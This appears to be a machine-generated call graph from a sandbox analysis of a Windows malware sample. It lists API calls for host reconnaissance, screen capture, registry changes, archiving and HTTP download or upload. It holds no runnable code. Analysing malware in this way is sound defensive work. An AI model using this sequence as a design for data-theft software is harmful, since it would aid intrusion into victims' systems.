WriteFile GetSystemWindowsDirectoryA WriteFile 81116 2c74f10 81115->81116 81116->81116 81117 2c74f17 WriteFile WriteFile WriteFile IsUserAnAdmin 81116->81117 81118 2c74f5f IsUserAnAdmin 81117->81118 81120 2c74f87 WriteFile WriteFile 81118->81120 81121 2c74f82 81118->81121 81239 2c747e0 RegOpenKeyExA 81120->81239 81121->81120 81125 2c74fb4 81281 2c743e0 memset CreateToolhelp32Snapshot 81125->81281 81127 2c74fba 81298 2c74630 81127->81298 81129 2c74fc0 81129->81092 81130 2c74fc8 GetHandleInformation 81129->81130 81130->81092 81131 2c74fd7 81130->81131 81131->81092 81132 2c74fdd CloseHandle 81131->81132 81132->81092 81134 2c93978 CreateCompatibleDC 81133->81134 81135 2c93971 81133->81135 81136 2c9398e 7 API calls 81134->81136 81137 2c93986 81134->81137 81135->81048 81138 2c93a1f GetProcessHeap HeapAlloc 81136->81138 81139 2c93a8e 81136->81139 81137->81048 81138->81139 81140 2c93a39 memset GetDIBits 81138->81140 81139->81048 81311 2c82ce0 81140->81311 81143 2c93a99 GetDIBits 81315 2c764b0 CreateFileA 81143->81315 81144 2c93a87 81145 2c82d20 4 API calls 81144->81145 81145->81139 81147 2c93ad1 81148 2c93ad8 WriteFile 81147->81148 81158 2c93b11 81147->81158 81316 2c766a0 WriteFile 81148->81316 81150 2c82d20 4 API calls 81152 2c93b22 81150->81152 81151 2c93aff 81317 2c766a0 WriteFile 81151->81317 81154 2c82d20 4 API calls 81152->81154 81157 2c93b2a ReleaseDC 81154->81157 81155 2c93b0a 81156 2c93e00 2 API calls 81155->81156 81156->81158 81157->81048 81158->81150 81159->81050 81160->81052 81162 2c93e2f 81161->81162 81163 2c93e0f GetHandleInformation 81161->81163 81162->81054 81163->81162 81164 2c93e1e 81163->81164 81164->81162 81165 2c93e24 CloseHandle 81164->81165 81165->81054 81167 2c82beb SetCurrentDirectoryA PathFileExistsA 81166->81167 81172 2c82629 81166->81172 81168 2c82c09 SetFileAttributesA DeleteFileA 81167->81168 81169 2c82c25 81167->81169 81168->81169 81170 2c82c3d GetProcessHeap HeapValidate 81169->81170 81171 2c82c57 81169->81171 81170->81171 81173 2c82c4c GetProcessHeap HeapFree 81170->81173 81174 2c82c5d GetProcessHeap HeapValidate 81171->81174 81175 2c82c77 LeaveCriticalSection 81171->81175 81176 2c8265a 81172->81176 81177 2c82665 PathAddBackslashA 81172->81177 81173->81171 81174->81175 81178 2c82c6c GetProcessHeap HeapFree 81174->81178 81175->81056 81377 2c753e0 39 API calls 81176->81377 81181 2c826a0 81177->81181 81178->81175 81181->81181 81182 2c826a8 SHGetFolderPathA PathAddBackslashA 81181->81182 81183 2c826f2 81182->81183 81183->81183 81184 2c8270c CopyFileA 81183->81184 81185 2c82740 81184->81185 81185->81185 81186 2c82753 PathAddBackslashA 81185->81186 81187 2c82763 81186->81187 81188 2c827dd GetTickCount _snprintf VirtualAlloc 81187->81188 81189 2c827c1 SetFileAttributesA DeleteFileA 81187->81189 81188->81167 81190 2c82821 lstrcpynA 81188->81190 81189->81188 81318 2c97b50 GetProcessHeap RtlAllocateHeap 81190->81318 81192 2c82840 81193 2c82855 VirtualFree 81192->81193 81328 2c97ce0 81192->81328 81195 2c766d0 26 API calls 81193->81195 81197 2c8286f SetFileAttributesA RemoveDirectoryA 81195->81197 81352 2c76930 81197->81352 81201 2c828df 81201->81167 81205 2c82b4a Sleep 81201->81205 81206 2c82b57 81201->81206 81361 2c82410 memset memset GetTempPathA GetTempFileNameA 81201->81361 81202 2c828b7 GetProcessHeap HeapAlloc 81202->81201 81203 2c828d3 memset 81202->81203 81203->81201 81205->81201 81205->81206 81206->81167 81207 2c82b89 IsUserAnAdmin GetTickCount RegOpenKeyExA 81206->81207 81207->81167 81208 2c82bbf RegSetValueExA RegFlushKey RegCloseKey 81207->81208 81208->81167 81210 2c76a16 SetFileAttributesA DeleteFileA 81209->81210 81211 2c76a25 81209->81211 81210->81211 81211->81026 81212->81019 81213->81025 81215 2c730eb 81214->81215 81216 2c766ea 81214->81216 81215->81085 81216->81215 81217 2c76702 GetProcessHeap HeapAlloc 81216->81217 81217->81215 81218 2c76726 memset lstrcpynA 81217->81218 81219 2c76742 81218->81219 81219->81219 81220 2c7674a FindFirstFileA 81219->81220 81220->81215 81231 2c76776 81220->81231 81221 2c768f7 FindNextFileA 81222 2c7690b FindClose 81221->81222 81221->81231 81233 2c82d20 81222->81233 81225 2c76825 GetProcessHeap HeapAlloc 81225->81215 81226 2c76845 memset lstrcpynA PathAddBackslashA 81225->81226 81226->81231 81227 2c768a5 SetFileAttributesA SetFileAttributesA DeleteFileA 81229 2c768c0 MoveFileExA 81227->81229 81230 2c768ca GetProcessHeap HeapValidate 81227->81230 81228 2c766d0 4 API calls 81228->81231 81229->81230 81230->81231 81232 2c768e0 GetProcessHeap HeapFree 81230->81232 81231->81215 81231->81221 81231->81225 81231->81227 81231->81228 81231->81230 81232->81231 81234 2c76917 SetFileAttributesA RemoveDirectoryA 81233->81234 81235 2c82d24 GetProcessHeap HeapValidate 81233->81235 81234->81215 81235->81234 81236 2c82d3b GetProcessHeap RtlFreeHeap 81235->81236 81236->81234 81237->81113 81238->81115 81240 2c74913 81239->81240 81241 2c74811 _snprintf 81239->81241 81249 2c740f0 GetProcessHeap HeapAlloc 81240->81249 81242 2c7483c 81241->81242 81243 2c74909 RegCloseKey 81241->81243 81244 2c74843 RegQueryValueExA 81242->81244 81246 2c74875 WriteFile 81242->81246 81247 2c7488e WriteFile 81242->81247 81248 2c748b7 WriteFile WriteFile _snprintf 81242->81248 81243->81240 81244->81242 81245 2c74908 81244->81245 81245->81243 81246->81247 81247->81242 81248->81244 81248->81245 81250 2c7412c 81249->81250 81251 2c7411c memset 81249->81251 81252 2c743c4 81250->81252 81253 2c7418d GetTcpTable 81250->81253 81251->81250 81252->81125 81254 2c74200 81253->81254 81255 2c7419f GetProcessHeap HeapValidate 81253->81255 81258 2c74204 GetProcessHeap HeapValidate 81254->81258 81259 2c7422d 81254->81259 81256 2c741af GetProcessHeap HeapFree 81255->81256 81257 2c741bb 81255->81257 81256->81257 81260 2c741c4 GetProcessHeap HeapAlloc 81257->81260 81261 2c741e8 81257->81261 81258->81252 81262 2c74218 GetProcessHeap HeapFree 81258->81262 81263 2c74240 GetProcessHeap HeapAlloc 81259->81263 81268 2c743cd 81259->81268 81260->81261 81264 2c741dc memset 81260->81264 81261->81252 81265 2c741f3 GetTcpTable 81261->81265 81262->81125 81267 2c7425f memset 81263->81267 81263->81268 81264->81261 81265->81254 81266 2c82d20 4 API calls 81269 2c743d7 81266->81269 81270 2c74274 81267->81270 81268->81266 81269->81125 81270->81270 81271 2c74363 81270->81271 81276 2c74291 81270->81276 81271->81271 81272 2c7438d WriteFile GetProcessHeap HeapValidate 81271->81272 81272->81252 81273 2c743b8 GetProcessHeap HeapFree 81272->81273 81273->81252 81274 2c74000 GetProcessHeap HeapAlloc _snprintf 81274->81276 81275 2c74360 81275->81271 81276->81274 81276->81275 81277 2c7432f GetProcessHeap HeapValidate 81276->81277 81279 2c742c7 htons htons _snprintf GetProcessHeap HeapValidate 81276->81279 81277->81276 81278 2c7433f GetProcessHeap HeapFree 81277->81278 81278->81276 81279->81276 81280 2c74320 GetProcessHeap HeapFree 81279->81280 81280->81276 81282 2c74606 81281->81282 81283 2c74433 Process32First 81281->81283 81282->81127 81284 2c74486 81283->81284 81285 2c7444b 81283->81285 81284->81282 81288 2c744a7 GetProcessHeap HeapAlloc 81284->81288 81285->81282 81286 2c74457 GetHandleInformation 81285->81286 81286->81282 81287 2c7446b 81286->81287 81287->81282 81289 2c74476 CloseHandle 81287->81289 81288->81282 81290 2c744c7 memset 81288->81290 81289->81127 81293 2c744e0 81290->81293 81291 2c744f0 OpenProcess 81292 2c74506 GetModuleFileNameExA 81291->81292 81291->81293 81292->81293 81293->81291 81294 2c74567 _snprintf Process32Next 81293->81294 81294->81291 81295 2c74599 81294->81295 81295->81295 81296 2c745c7 WriteFile GetProcessHeap HeapValidate 81295->81296 81296->81282 81297 2c745fa GetProcessHeap HeapFree 81296->81297 81297->81282 81299 2c74660 NetQueryDisplayInformation 81298->81299 81308 2c74684 81299->81308 81300 2c7476a WriteFile 81304 2c74796 GetProcessHeap HeapValidate 81300->81304 81305 2c747b8 81300->81305 81302 2c746b1 GetProcessHeap HeapAlloc 81306 2c746d0 memset 81302->81306 81302->81308 81303 2c747c1 NetApiBufferFree 81303->81129 81304->81305 81307 2c747ac GetProcessHeap HeapFree 81304->81307 81305->81129 81306->81308 81307->81305 81308->81300 81308->81302 81308->81303 81309 2c7470f _snprintf 81308->81309 81310 2c7473d NetApiBufferFree 81308->81310 81309->81308 81310->81299 81310->81300 81312 2c82d12 81311->81312 81313 2c82ce6 GetProcessHeap RtlAllocateHeap 81311->81313 81312->81143 81312->81144 81313->81312 81314 2c82d04 memset 81313->81314 81314->81312 81315->81147 81316->81151 81317->81155 81319 2c97b74 memset 81318->81319 81320 2c97b9f 81318->81320 81319->81320 81321 2c97be5 81320->81321 81327 2c97bbe CreateFileA 81320->81327 81322 2c97bf3 GetProcessHeap HeapValidate 81321->81322 81323 2c97c16 GetProcessHeap HeapAlloc 81321->81323 81324 2c97c0d 81322->81324 81325 2c97c02 GetProcessHeap HeapFree 81322->81325 81326 2c97c27 81323->81326 81324->81192 81325->81324 81326->81192 81327->81321 81330 2c97cfb 81328->81330 81329 2c8284f 81341 2c97c50 81329->81341 81330->81329 81330->81330 81331 2c97d57 LocalAlloc 81330->81331 81331->81329 81332 2c97d71 _snprintf FindFirstFileA LocalFree 81331->81332 81333 2c97eeb FindClose 81332->81333 81340 2c97da7 81332->81340 81333->81329 81334 2c97ed7 FindNextFileA 81334->81333 81334->81340 81335 2c97dc6 wsprintfA wsprintfA 81335->81340 81336 2c97e77 memset lstrcpynA 81378 2c97530 81336->81378 81337 2c97ce0 76 API calls 81337->81340 81338 2c97530 76 API calls 81338->81340 81340->81334 81340->81335 81340->81336 81340->81337 81340->81338 81342 2c97c5b 81341->81342 81343 2c97c6a 81341->81343 81342->81193 81344 2c97c6f 81343->81344 81650 2c96ff0 81343->81650 81344->81193 81346 2c97c88 81347 2c97cb3 GetProcessHeap HeapValidate 81346->81347 81348 2c97c97 GetProcessHeap HeapValidate 81346->81348 81350 2c97ccf 81347->81350 81351 2c97cc3 GetProcessHeap HeapFree 81347->81351 81348->81347 81349 2c97ca7 GetProcessHeap HeapFree 81348->81349 81349->81347 81350->81193 81351->81350 81819 2c76570 81352->81819 81354 2c769be 81354->81167 81354->81201 81354->81202 81355 2c7699c GetProcessHeap HeapValidate 81355->81354 81357 2c769b2 GetProcessHeap HeapFree 81355->81357 81357->81354 81358 2c76963 GetProcessHeap RtlAllocateHeap 81359 2c7698b 81358->81359 81360 2c7697f memset 81358->81360 81359->81355 81360->81359 81836 2c76240 memset memset RegOpenKeyExA 81361->81836 81363 2c824eb 81848 2c839c0 memset 81363->81848 81365 2c82512 81367 2c825a8 81365->81367 81368 2c76570 13 API calls 81365->81368 81366 2c82487 81366->81363 81369 2c824c9 GetProcessHeap HeapValidate 81366->81369 81367->81201 81370 2c8252b 81368->81370 81369->81363 81371 2c824dc GetProcessHeap HeapFree 81369->81371 81370->81367 81372 2c82531 SetFileAttributesA DeleteFileA 81370->81372 81371->81363 81373 2c8257c GetProcessHeap HeapValidate 81372->81373 81374 2c82552 81372->81374 81375 2c8259c 81373->81375 81376 2c82591 GetProcessHeap HeapFree 81373->81376 81374->81373 81375->81201 81376->81375 81377->81177 81379 2c97554 81378->81379 81380 2c97546 81378->81380 81381 2c97568 lstrcpynA 81379->81381 81382 2c9755a 81379->81382 81380->81340 81383 2c9760b 81381->81383 81384 2c9758b 81381->81384 81382->81340 81383->81340 81385 2c975e9 81384->81385 81386 2c975f5 81384->81386 81430 2c97090 81385->81430 81388 2c975fa 81386->81388 81389 2c97606 81386->81389 81528 2c97130 81388->81528 81389->81383 81392 2c9763a 81389->81392 81390 2c975f3 81390->81383 81394 2c97645 lstrcpynA lstrcpynA 81390->81394 81537 2c97210 GetLocalTime SystemTimeToFileTime FileTimeToDosDateTime 81392->81537 81396 2c97680 81394->81396 81395 2c976b9 lstrcpynA 81397 2c9772b 81395->81397 81396->81395 81396->81396 81441 2c961d0 81397->81441 81400 2c9781b 81404 2c97350 2 API calls 81400->81404 81401 2c9782e 81402 2c97859 81401->81402 81403 2c97848 81401->81403 81406 2c97874 81402->81406 81408 2c97878 81402->81408 81409 2c97867 81402->81409 81405 2c97350 2 API calls 81403->81405 81404->81383 81407 2c9784d 81405->81407 81517 2c97350 81406->81517 81407->81340 81408->81406 81538 2c974c0 10 API calls 81408->81538 81506 2c973c0 GetProcessHeap RtlAllocateHeap 81409->81506 81414 2c978cf 81523 2c96fa0 81414->81523 81415 2c97940 81416 2c9794c 81415->81416 81539 2c96470 8 API calls 81415->81539 81416->81340 81419 2c9790d 81419->81383 81420 2c961d0 8 API calls 81419->81420 81421 2c9791c 81420->81421 81421->81383 81424 2c96fa0 SetFilePointer 81421->81424 81422 2c97992 81423 2c979a1 memcpy GetProcessHeap HeapAlloc 81422->81423 81540 2c82de0 GetProcessHeap HeapAlloc memset 81422->81540 81428 2c979e2 memset 81423->81428 81429 2c979f2 81423->81429 81427 2c9792e 81424->81427 81427->81383 81427->81422 81428->81429 81429->81340 81429->81429 81431 2c970c2 CreateFileA 81430->81431 81432 2c970b6 81430->81432 81433 2c970e8 81431->81433 81434 2c970dc 81431->81434 81432->81390 81435 2c97130 19 API calls 81433->81435 81434->81390 81436 2c970ed 81435->81436 81437 2c97117 81436->81437 81438 2c970fb GetHandleInformation 81436->81438 81437->81390 81438->81437 81439 2c9710a 81438->81439 81439->81437 81440 2c97110 CloseHandle 81439->81440 81440->81437 81541 2c96e90 81441->81541 81443 2c961e5 81444 2c96e90 8 API calls 81443->81444 81445 2c961f6 81444->81445 81446 2c96e90 8 API calls 81445->81446 81447 2c96207 81446->81447 81448 2c96e90 8 API calls 81447->81448 81449 2c96218 81448->81449 81450 2c96e90 8 API calls 81449->81450 81451 2c9622c 81450->81451 81452 2c96e90 8 API calls 81451->81452 81453 2c96240 81452->81453 81454 2c96e90 8 API calls 81453->81454 81455 2c96254 81454->81455 81456 2c96e90 8 API calls 81455->81456 81457 2c96268 81456->81457 81458 2c96e90 8 API calls 81457->81458 81459 2c9627c 81458->81459 81460 2c96e90 8 API calls 81459->81460 81461 2c96290 81460->81461 81462 2c96e90 8 API calls 81461->81462 81463 2c962a4 81462->81463 81464 2c96e90 8 API calls 81463->81464 81465 2c962b8 81464->81465 81466 2c96e90 8 API calls 81465->81466 81467 2c962cc 81466->81467 81468 2c96e90 8 API calls 81467->81468 81469 2c962e0 81468->81469 81470 2c96e90 8 API calls 81469->81470 81471 2c962f4 81470->81471 81472 2c96e90 8 API calls 81471->81472 81473 2c96308 81472->81473 81474 2c96e90 8 API calls 81473->81474 81475 2c9631c 81474->81475 81476 2c96e90 8 API calls 81475->81476 81477 2c96330 81476->81477 81478 2c96e90 8 API calls 81477->81478 81479 2c96344 81478->81479 81480 2c96e90 8 API calls 81479->81480 81481 2c96358 81480->81481 81482 2c96e90 8 API calls 81481->81482 81483 2c9636c 81482->81483 81484 2c96e90 8 API calls 81483->81484 81485 2c96380 81484->81485 81486 2c96e90 8 API calls 81485->81486 81487 2c96394 81486->81487 81488 2c96e90 8 API calls 81487->81488 81489 2c963a8 81488->81489 81490 2c96e90 8 API calls 81489->81490 81491 2c963bc 81490->81491 81492 2c96e90 8 API calls 81491->81492 81493 2c963d0 81492->81493 81494 2c96e90 8 API calls 81493->81494 81495 2c963e4 81494->81495 81496 2c96e90 8 API calls 81495->81496 81497 2c963fa 81496->81497 81498 2c96e90 8 API calls 81497->81498 81499 2c9640e 81498->81499 81500 2c96e90 8 API calls 81499->81500 81501 2c96424 81500->81501 81502 2c9643a 81501->81502 81503 2c96e90 8 API calls 81501->81503 81504 2c9643f 81502->81504 81505 2c96e90 8 API calls 81502->81505 81503->81502 81504->81400 81504->81401 81505->81504 81507 2c973e8 memset 81506->81507 81508 2c973fc 81506->81508 81574 2c94270 17 API calls 81507->81574 81556 2c95870 81508->81556 81513 2c97484 GetProcessHeap HeapValidate 81515 2c974ab GetProcessHeap RtlFreeHeap 81513->81515 81516 2c974b6 81513->81516 81515->81516 81516->81406 81518 2c9735a 81517->81518 81519 2c97385 81517->81519 81518->81519 81520 2c97362 GetHandleInformation 81518->81520 81519->81383 81519->81414 81519->81415 81520->81519 81521 2c97378 81520->81521 81521->81519 81522 2c9737e CloseHandle 81521->81522 81522->81519 81524 2c96fb0 81523->81524 81525 2c96fa6 81523->81525 81526 2c96fb6 81524->81526 81527 2c96fd1 SetFilePointer 81524->81527 81525->81419 81526->81419 81527->81419 81529 2c97159 81528->81529 81530 2c971ff 81528->81530 81529->81530 81531 2c97162 GetFileType 81529->81531 81530->81390 81532 2c9716e 81531->81532 81533 2c971a0 GetLocalTime SystemTimeToFileTime FileTimeToDosDateTime 81531->81533 81636 2c96c70 GetFileType 81532->81636 81533->81390 81535 2c97183 81535->81530 81536 2c97187 SetFilePointer 81535->81536 81536->81390 81537->81390 81538->81406 81539->81427 81540->81423 81542 2c96ea3 81541->81542 81543 2c96f64 81541->81543 81546 2c96f42 memcpy 81542->81546 81547 2c96ebf CreateFileMappingA 81542->81547 81544 2c96f6a WriteFile 81543->81544 81545 2c96f90 81543->81545 81544->81443 81545->81443 81546->81443 81549 2c96eff 81547->81549 81550 2c96ee3 MapViewOfFile 81547->81550 81549->81443 81551 2c96efa 81550->81551 81552 2c96f0d memcpy UnmapViewOfFile 81550->81552 81554 2c93e00 2 API calls 81551->81554 81553 2c93e00 2 API calls 81552->81553 81555 2c96f30 81553->81555 81554->81549 81555->81546 81557 2c95882 memset 81556->81557 81559 2c95908 81557->81559 81563 2c97290 2 API calls 81559->81563 81560 2c9595c 81564 2c95ee0 81560->81564 81561 2c9593b 81561->81560 81575 2c95b50 memcpy memcpy ReadFile 81561->81575 81563->81561 81565 2c95f03 81564->81565 81573 2c95f0e 81564->81573 81596 2c95c90 12 API calls 81565->81596 81567 2c9617f 81576 2c94fe0 81567->81576 81568 2c95f08 81568->81513 81572 2c94fe0 9 API calls 81572->81573 81573->81567 81573->81572 81597 2c95b50 memcpy memcpy ReadFile 81573->81597 81574->81508 81575->81560 81577 2c9500d 81576->81577 81578 2c950a0 81577->81578 81579 2c95067 81577->81579 81580 2c950e1 81578->81580 81581 2c950a6 81578->81581 81583 2c95580 8 API calls 81579->81583 81598 2c95580 81580->81598 81584 2c95580 8 API calls 81581->81584 81586 2c9506f 81583->81586 81587 2c950af 81584->81587 81626 2c95730 9 API calls 81586->81626 81590 2c95390 8 API calls 81587->81590 81593 2c9509b 81590->81593 81594 2c9516c 81593->81594 81622 2c95640 81593->81622 81594->81513 81596->81568 81597->81573 81599 2c9558f 81598->81599 81600 2c950ea 81599->81600 81627 2c96e60 81599->81627 81602 2c94f10 81600->81602 81603 2c94f27 81602->81603 81604 2c95580 8 API calls 81603->81604 81605 2c94f63 81604->81605 81606 2c95580 8 API calls 81605->81606 81607 2c94f71 81606->81607 81608 2c95580 8 API calls 81607->81608 81609 2c94f7c 81608->81609 81610 2c94fac 81609->81610 81612 2c95580 8 API calls 81609->81612 81632 2c94ce0 81610->81632 81612->81609 81614 2c94ce0 8 API calls 81615 2c94fce 81614->81615 81616 2c95390 81615->81616 81619 2c954a9 81616->81619 81620 2c953ae 81616->81620 81617 2c95580 8 API calls 81618 2c954c2 81617->81618 81618->81593 81619->81617 81620->81619 81621 2c95580 8 API calls 81620->81621 81621->81620 81623 2c9564c 81622->81623 81624 2c95703 81623->81624 81625 2c96e60 8 API calls 81623->81625 81624->81594 81625->81624 81626->81593 81628 2c96e6d 81627->81628 81629 2c96e72 81627->81629 81628->81600 81630 2c96e90 8 API calls 81629->81630 81631 2c96e7f 81630->81631 81631->81600 81633 2c94d05 81632->81633 81634 2c94e35 81633->81634 81635 2c95580 8 API calls 81633->81635 81634->81614 81635->81633 81637 2c96c91 GetFileInformationByHandle 81636->81637 81638 2c96c84 81636->81638 81639 2c96cad GetSystemTime GetLocalTime SystemTimeToFileTime SystemTimeToFileTime 81637->81639 81640 2c96ca0 81637->81640 81638->81535 81641 2c96d05 GetFileSize 81639->81641 81640->81535 81643 2c96d6e SetFilePointer ReadFile SetFilePointer ReadFile 81641->81643 81646 2c96dfd 81641->81646 81644 2c96db5 81643->81644 81643->81646 81645 2c96dc0 SetFilePointer ReadFile 81644->81645 81644->81646 81647 2c96de1 81645->81647 81648 2c96e2d FileTimeToDosDateTime 81646->81648 81649 2c96e4e 81646->81649 81647->81646 81648->81649 81649->81535 81651 2c96ffd 81650->81651 81657 2c97003 81650->81657 81665 2c97a50 81651->81665 81652 2c9701d 81655 2c9702b GetHandleInformation 81652->81655 81656 2c9704e 81652->81656 81654 2c97016 UnmapViewOfFile 81654->81652 81655->81656 81658 2c97041 81655->81658 81659 2c97059 GetHandleInformation 81656->81659 81660 2c97086 81656->81660 81657->81652 81657->81654 81658->81656 81661 2c97047 CloseHandle 81658->81661 81662 2c97078 81659->81662 81663 2c9706b 81659->81663 81660->81346 81661->81656 81662->81346 81663->81662 81664 2c97071 CloseHandle 81663->81664 81664->81662 81666 2c97a78 81665->81666 81673 2c97b04 81665->81673 81669 2c97ab3 GetProcessHeap HeapValidate 81666->81669 81670 2c97ad7 GetProcessHeap HeapValidate 81666->81670 81666->81673 81675 2c965b0 81666->81675 81669->81670 81671 2c97ac7 GetProcessHeap HeapFree 81669->81671 81670->81666 81672 2c97aed GetProcessHeap HeapFree 81670->81672 81671->81670 81672->81666 81674 2c97b24 81673->81674 81774 2c969b0 81673->81774 81674->81657 81676 2c96e90 8 API calls 81675->81676 81677 2c965c5 81676->81677 81678 2c96e90 8 API calls 81677->81678 81679 2c965d6 81678->81679 81680 2c96e90 8 API calls 81679->81680 81681 2c965e7 81680->81681 81682 2c96e90 8 API calls 81681->81682 81683 2c965f8 81682->81683 81684 2c96e90 8 API calls 81683->81684 81685 2c9660b 81684->81685 81686 2c96e90 8 API calls 81685->81686 81687 2c9661f 81686->81687 81688 2c96e90 8 API calls 81687->81688 81689 2c96633 81688->81689 81690 2c96e90 8 API calls 81689->81690 81691 2c96647 81690->81691 81692 2c96e90 8 API calls 81691->81692 81693 2c9665b 81692->81693 81694 2c96e90 8 API calls 81693->81694 81695 2c9666f 81694->81695 81696 2c96e90 8 API calls 81695->81696 81697 2c96683 81696->81697 81698 2c96e90 8 API calls 81697->81698 81699 2c96697 81698->81699 81700 2c96e90 8 API calls 81699->81700 81701 2c966ab 81700->81701 81702 2c96e90 8 API calls 81701->81702 81703 2c966bf 81702->81703 81704 2c96e90 8 API calls 81703->81704 81705 2c966d3 81704->81705 81706 2c96e90 8 API calls 81705->81706 81707 2c966e7 81706->81707 81708 2c96e90 8 API calls 81707->81708 81709 2c966fb 81708->81709 81710 2c96e90 8 API calls 81709->81710 81711 2c9670f 81710->81711 81712 2c96e90 8 API calls 81711->81712 81713 2c96723 81712->81713 81714 2c96e90 8 API calls 81713->81714 81715 2c96737 81714->81715 81716 2c96e90 8 API calls 81715->81716 81717 2c9674b 81716->81717 81718 2c96e90 8 API calls 81717->81718 81719 2c9675f 81718->81719 81720 2c96e90 8 API calls 81719->81720 81721 2c96773 81720->81721 81722 2c96e90 8 API calls 81721->81722 81723 2c96787 81722->81723 81724 2c96e90 8 API calls 81723->81724 81725 2c9679b 81724->81725 81726 2c96e90 8 API calls 81725->81726 81727 2c967af 81726->81727 81728 2c96e90 8 API calls 81727->81728 81729 2c967c3 81728->81729 81730 2c96e90 8 API calls 81729->81730 81731 2c967d7 81730->81731 81732 2c96e90 8 API calls 81731->81732 81733 2c967eb 81732->81733 81734 2c96e90 8 API calls 81733->81734 81735 2c96801 81734->81735 81736 2c96e90 8 API calls 81735->81736 81737 2c96815 81736->81737 81738 2c96e90 8 API calls 81737->81738 81739 2c9682b 81738->81739 81740 2c96e90 8 API calls 81739->81740 81741 2c9683f 81740->81741 81742 2c96e90 8 API calls 81741->81742 81743 2c96855 81742->81743 81744 2c96e90 8 API calls 81743->81744 81745 2c96869 81744->81745 81746 2c96e90 8 API calls 81745->81746 81747 2c9687d 81746->81747 81748 2c96e90 8 API calls 81747->81748 81749 2c96891 81748->81749 81750 2c96e90 8 API calls 81749->81750 81751 2c968a5 81750->81751 81752 2c96e90 8 API calls 81751->81752 81753 2c968b9 81752->81753 81754 2c96e90 8 API calls 81753->81754 81755 2c968cd 81754->81755 81756 2c96e90 8 API calls 81755->81756 81757 2c968e1 81756->81757 81758 2c96e90 8 API calls 81757->81758 81759 2c968f5 81758->81759 81760 2c96e90 8 API calls 81759->81760 81761 2c96909 81760->81761 81762 2c96e90 8 API calls 81761->81762 81763 2c9691d 81762->81763 81764 2c96e90 8 API calls 81763->81764 81765 2c96931 81764->81765 81766 2c96e90 8 API calls 81765->81766 81767 2c96945 81766->81767 81768 2c9695b 81767->81768 81770 2c96e90 8 API calls 81767->81770 81769 2c96991 81768->81769 81771 2c96976 81768->81771 81772 2c96e90 8 API calls 81768->81772 81769->81666 81770->81768 81771->81769 81773 2c96e90 8 API calls 81771->81773 81772->81771 81773->81769 81775 2c96e90 8 API calls 81774->81775 81776 2c969c9 81775->81776 81777 2c96e90 8 API calls 81776->81777 81778 2c969da 81777->81778 81779 2c96e90 8 API calls 81778->81779 81780 2c969eb 81779->81780 81781 2c96e90 8 API calls 81780->81781 81782 2c969fc 81781->81782 81783 2c96e90 8 API calls 81782->81783 81784 2c96a0d 81783->81784 81785 2c96e90 8 API calls 81784->81785 81786 2c96a1e 81785->81786 81787 2c96e90 8 API calls 81786->81787 81788 2c96a2f 81787->81788 81789 2c96e90 8 API calls 81788->81789 81790 2c96a40 81789->81790 81791 2c96e90 8 API calls 81790->81791 81792 2c96a53 81791->81792 81793 2c96e90 8 API calls 81792->81793 81794 2c96a6c 81793->81794 81795 2c96e90 8 API calls 81794->81795 81796 2c96a7f 81795->81796 81797 2c96e90 8 API calls 81796->81797 81798 2c96a92 81797->81798 81799 2c96e90 8 API calls 81798->81799 81800 2c96aa5 81799->81800 81801 2c96e90 8 API calls 81800->81801 81802 2c96abb 81801->81802 81803 2c96e90 8 API calls 81802->81803 81804 2c96ad1 81803->81804 81805 2c96e90 8 API calls 81804->81805 81806 2c96ae7 81805->81806 81807 2c96e90 8 API calls 81806->81807 81808 2c96af7 81807->81808 81809 2c96e90 8 API calls 81808->81809 81810 2c96b0c 81809->81810 81811 2c96e90 8 API calls 81810->81811 81812 2c96b21 81811->81812 81813 2c96e90 8 API calls 81812->81813 81814 2c96b34 81813->81814 81815 2c96e90 8 API calls 81814->81815 81816 2c96b45 81815->81816 81817 2c96e90 8 API calls 81816->81817 81818 2c96b56 81817->81818 81818->81674 81820 2c76585 CreateFileA 81819->81820 81821 2c76674 81819->81821 81820->81821 81822 2c765aa GetFileSizeEx 81820->81822 81823 2c7667b IsBadWritePtr 81821->81823 81825 2c7668a 81821->81825 81824 2c765c8 81822->81824 81830 2c76643 81822->81830 81823->81825 81828 2c765d4 GetProcessHeap RtlAllocateHeap 81824->81828 81833 2c765fc 81824->81833 81825->81354 81825->81355 81825->81358 81825->81359 81826 2c76658 GetHandleInformation 81826->81821 81827 2c76667 81826->81827 81827->81821 81831 2c7666d CloseHandle 81827->81831 81832 2c765f0 memset 81828->81832 81828->81833 81829 2c76606 ReadFile 81829->81830 81834 2c76620 GetProcessHeap HeapValidate 81829->81834 81830->81821 81830->81826 81831->81821 81832->81833 81833->81829 81833->81830 81834->81830 81835 2c76633 GetProcessHeap HeapFree 81834->81835 81835->81830 81837 2c76384 81836->81837 81838 2c762b9 RegQueryValueExA 81836->81838 81839 2c76392 81837->81839 81840 2c7638b RegCloseKey 81837->81840 81838->81837 81844 2c762e0 81838->81844 81841 2c763a5 81839->81841 81888 2c760e0 memset memset RegOpenKeyExA 81839->81888 81840->81839 81841->81366 81844->81837 81845 2c76343 GetProcessHeap HeapAlloc 81844->81845 81845->81837 81846 2c7635d memset 81845->81846 81846->81837 81847 2c76371 lstrcpynA 81846->81847 81847->81837 81849 2c83d4d 81848->81849 81863 2c83a0b 81848->81863 81850 2c83d7f 81849->81850 81908 2c83620 memset 81849->81908 81850->81365 81851 2c83a71 InternetOpenA 81851->81849 81853 2c83a91 InternetConnectA 81851->81853 81855 2c83ab2 HttpOpenRequestA 81853->81855 81856 2c83d43 InternetCloseHandle 81853->81856 81854 2c83d76 81854->81365 81858 2c83ae8 81855->81858 81859 2c83d39 InternetCloseHandle 81855->81859 81856->81849 81860 2c83b0d HttpAddRequestHeadersA 81858->81860 81864 2c83afe HttpAddRequestHeadersA 81858->81864 81859->81856 81861 2c83b52 HttpSendRequestA 81860->81861 81862 2c83b22 _snprintf HttpAddRequestHeadersA 81860->81862 81865 2c83d2c InternetCloseHandle 81861->81865 81866 2c83b6d HttpQueryInfoA 81861->81866 81862->81861 81863->81849 81863->81851 81864->81860 81865->81859 81866->81865 81867 2c83b8d 81866->81867 81867->81865 81868 2c83b9a CreateFileA 81867->81868 81868->81865 81869 2c83bc4 81868->81869 81870 2c83bd0 GetProcessHeap RtlAllocateHeap 81869->81870 81871 2c83bea memset InternetReadFile 81870->81871 81872 2c83c73 81870->81872 81875 2c83c19 81871->81875 81876 2c83c57 GetProcessHeap HeapValidate 81871->81876 81873 2c83c9a 81872->81873 81874 2c83c77 GetHandleInformation 81872->81874 81879 2c76570 13 API calls 81873->81879 81874->81873 81878 2c83c8d 81874->81878 81875->81876 81880 2c83c20 WriteFile GetProcessHeap HeapValidate 81875->81880 